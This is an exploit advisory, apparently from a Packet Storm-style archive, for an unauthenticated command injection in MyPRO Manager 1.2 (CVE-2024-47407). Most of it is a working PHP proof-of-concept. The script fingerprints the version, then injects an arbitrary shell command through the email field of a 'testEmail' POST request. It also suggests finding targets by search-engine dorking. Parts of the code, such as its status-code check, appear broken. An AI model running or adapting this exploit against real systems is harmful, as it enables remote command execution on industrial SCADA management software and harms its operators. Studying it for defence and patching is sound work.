MyPRO Manager 1.2 Command Injection

=============================================================================================================================================
| # Title MyPRO Manager 1.2 Command Injection

=============================================================================================================================================
| # Title : MyPRO Manager 1.2 php code injection |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.myscada.org/mypro/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: MyPRO Manager versions 1.2 and below suffer from an unauthenticated command injection vulnerability.

(Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: CVE-2024-47407 ) .

[+] save code as poc.php.

[+] Set Target : line 79.

[+] Usage : php poc.php

[+] PayLoad :

<?php
class MyPROManagerExploit {
private $targetUri;
private $rport = 34022;
private $ssl = false;
private $targetPath = '/';

public function __construct($targetUri) {
$this->targetUri = $targetUri;
}

public function check() {
try {
$url = $this->targetUri . '/assets/index-Aup6jYxO.js';
$response = $this->sendRequest($url, 'GET');

if (preg_match('/const v="([^"]+)"/', $response, $matches)) {
$version = $matches[1];
echo 'Version retrieved: ' . $version . "\n";
if (version_compare($version, '1.2', '<=')) {
return "Appears vulnerable";
}
return "Safe";
}
} catch (Exception $e) {
return "Unknown";
}
return "Unknown";
}

public function exploit($cmd) {
$this->executeCommand($cmd);
}

private function executeCommand($cmd) {
$this->execMyPROMgr($cmd);
echo 'Exploit finished, check thy shell.' . "\n";
}

private function execMyPROMgr($cmd) {
$postData = [
'command' => 'testEmail',
'email' => $this->generateRandomString(3, 12) . '@' . $this->generateRandomString(4, 8) . '.com&&' . $cmd . ' #'
];

$response = $this->sendRequest($this->targetUri . '/get', 'POST', json_encode($postData));

if ($response && $this->getHttpResponseCode($response) == 200) {
echo 'Command successfully executed, check your shell.' . "\n";
} else {
echo 'Unexpected or no reply received.' . "\n";
}
}

private function sendRequest($url, $method, $data = null) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($method === 'POST') {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

private function generateRandomString($minLength, $maxLength) {
$length = rand($minLength, $maxLength);
return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
}

private function getHttpResponseCode($response) {
return substr($response, 9, 3); // Assuming response contains status code as the first 3 digits after HTTP/1.1
}
}

// Example usage
$exploit = new MyPROManagerExploit('http://example.com');
$checkResult = $exploit->check();
echo $checkResult . "\n";

if ($checkResult == "Appears vulnerable") {
$exploit->exploit('id'); // Exploit with a sample command like 'id'
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================